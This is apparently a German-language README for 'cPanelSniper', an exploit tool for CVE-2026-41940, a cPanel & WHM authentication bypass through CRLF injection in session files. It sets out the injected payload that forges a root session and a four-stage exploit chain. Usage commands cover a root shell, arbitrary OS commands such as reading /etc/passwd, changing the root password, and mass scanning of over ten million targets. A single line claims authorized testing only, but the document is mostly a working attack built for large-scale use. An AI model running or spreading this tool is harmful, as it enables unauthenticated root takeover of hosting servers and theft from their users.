
cPanelSniper STABLE - CVE-2026-41940 optimiert für 10M+ Ziele
CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection
4-stufige Exploit-Kette · Interaktive WHM-Shell · TRUE STABLE für 10M+ Ziele · Null Speichernutzung · nur stdlib
cPanelSniper ist ein fokussiertes Exploitation-Framework für CVE-2026-41940, eine kritische Authentifizierungs-Bypass-Schwachstelle, die cPanel & WHM betrifft. Die Schwachstelle ermöglicht es nicht authentifizierten Remote-Angreifern, Root-Zugriff auf WHM zu erlangen, indem CRLF-Sequenzen über den Authorization-HTTP-Header in die Session-Datei injiziert werden — ohne gültige Anmeldedaten.
Nur für autorisierte Penetrationstests und Bug-Bounty-Programme.
Diese Version ist für das Scannen von 10.000.000+ Zielen mit NULL Speichernutzung optimiert.
| Problem | Originalversion | Behobene Version |
|---|---|---|
| Speichernutzung | Lädt alle Ziele in den RAM | Streamt Ziele zeilenweise (0 Speicher) |
| 10M Ziele | OOM → Beendet ❌ | Wird erfolgreich abgeschlossen ✅ |
| Fortsetzen | Nicht unterstützt | --resume-Flag |
| Fortschritt | Keine ETA | Echtzeit-ETA + Rate + Statistiken |
| Ergebnisse | Nur am Ende gespeichert | Alle 60s gespeichert (konfigurierbar) |
--resume an der Stelle, an der Sie aufgehört habensubfinder, httpx, shodanDie Ursache liegt in Session.pm: Die Funktion saveSession() ruft filter_sessiondata() nach dem Schreiben der Session-Datei auf die Festplatte auf. Das bedeutet, dass CRLF-Zeichen, die im Wert des Authorization: Basic-Headers eingebettet sind, unverändert in die Session-Datei geschrieben werden und angreiferkontrollierte Felder vor der Bereinigung injizieren.
Normaler Ablauf:
POST /login/ → filter_sessiondata() → Session schreiben → Auth-Check
Verwundbarer Ablauf:
POST /login/ → Session schreiben (CRLF-Payload injiziert) → filter_sessiondata() → Auth-Check liest vergiftete Datei
Der Authorization: Basic-Wert wird dekodiert zu:
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
Diese Felder werden direkt in die Session-Datei auf der Festplatte geschrieben. Beim Zurücklesen behandelt cPanel die Session als vollständig authentifizierte Root-Session.
┌─────────────────────────────────────────────────────────────┐
│ Stufe 0 — Kanonische Hostname-Erkennung │
│ GET /openid_connect/cpanelid → 307 → echter Hostname │
├─────────────────────────────────────────────────────────────┤
│ Stufe 1 — Preauth-Session erzeugen │
│ POST /login/?login_only=1 (falsche Anmeldedaten) │
│ ← 401 + whostmgrsession-Cookie │
├─────────────────────────────────────────────────────────────┤
│ Stufe 2 — CRLF-Injektion │
│ GET / + Cookie: session + Authorization: Basic <payload> │
│ cpsrvd schreibt CRLF-Felder in die Session-Datei │
│ ← 307 Location: /cpsessXXXXXXXXXX/... │
├─────────────────────────────────────────────────────────────┤
│ Stufe 3 — Propagieren (do_token_denied-Gadget) │
│ GET /scripts2/listaccts │
│ Löst raw→cache-Flush aus — injizierte Felder werden aktiv │
│ ← 401 Token denied (erwartet) │
├─────────────────────────────────────────────────────────────┤
│ Stufe 4 — WHM-Root-Zugriff verifizieren │
│ GET /cpsessXXXXXXXXXX/json-api/version │
│ ← 200 {"version":"11.x.x.x","result":1} = PWNED │
└─────────────────────────────────────────────────────────────┘
| Branch | Verwundbar | Gepatcht |
|---|---|---|
| 110.x | ≤ 11.110.0.96 | 11.110.0.97 |
| 118.x | ≤ 11.118.0.62 | 11.118.0.63 |
| 126.x | ≤ 11.126.0.53 | 11.126.0.54 |
| 132.x | ≤ 11.132.0.28 | 11.132.0.29 |
| 134.x | ≤ 11.134.0.19 | 11.134.0.20 |
| 136.x | ≤ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/44pie/cpsniper
cd cpsniper
python3 cPanelSniper.py --help
Keine pip-Installation erforderlich. Nur reine Python-3.8+-stdlib.
# Einzelnes Ziel — nur scannen
python3 cPanelSniper.py -u https://target.com:2087
# Einzelnes Ziel — interaktive Shell nach dem Bypass
python3 cPanelSniper.py -u https://target.com:2087 --action shell
# Große Zielliste — 10M+ Ziele (TRUE STABLE)
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json
# Unterbrochenen Scan fortsetzen
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume
# Alle cPanel-Konten auf dem Server auflisten
python3 cPanelSniper.py -u https://target.com:2087 --action list
# OS-Befehl ausführen
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"
# Serverinformationen abrufen (Hostname, Last, Festplatte, MySQL-Host)
python3 cPanelSniper.py -u https://target.com:2087 --action info
# cPanel-Version abrufen
python3 cPanelSniper.py -u https://target.com:2087 --action version
# Root-Passwort ändern
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'
# Interaktive WHM-Shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell
# subfinder → httpx → in Datei speichern → 10M+ Ziele scannen
subfinder -d target.com -silent | \
httpx -silent -ports 2087,2086 -threads 50 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json